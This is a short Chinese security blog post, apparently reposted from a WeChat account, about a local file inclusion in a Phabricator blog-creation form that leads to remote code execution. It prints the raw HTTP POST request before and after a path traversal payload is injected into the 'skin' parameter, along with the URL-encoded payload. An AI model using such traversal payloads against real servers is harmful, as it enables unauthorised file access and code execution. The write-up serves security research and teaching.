正文
创建博客/文章/文件功能出现问题。
原请求:
POST /blog/new/ HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://phabricator.48bits.com/phame/blog/new/
Cookie: phsid=o36kfovszv6sqpbjheacicu2ykx25lqoh5iepeit; phusr=guest
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 254
__csrf__=xxxyyy&__form__=1&name=username&skin=xxxxx
注入payload之后:
POST /blog/new/ HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://phabricator.48bits.com/phame/blog/new/
Cookie: phsid=o36kfovszv6sqpbjheacicu2ykx25lqoh5iepeit; phusr=guest
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 254
__csrf__=xxxyyy&__form__=1&name=username&skin=../../../../../../../../../../tmp/test
注:../../../../../../../../../../tmp/test编码以后就是%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%74%6d%70%2f%74%65%73%74
类似这种创建文章/博客/文件之类的一个 隐患就是有可能将文件上传到服务器
这里就出现了一个利用LFI获得了远程代码执行,从而获得服务器数据的访问权限
原文始发于微信公众号(迪哥讲事):由LFI所导致的RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论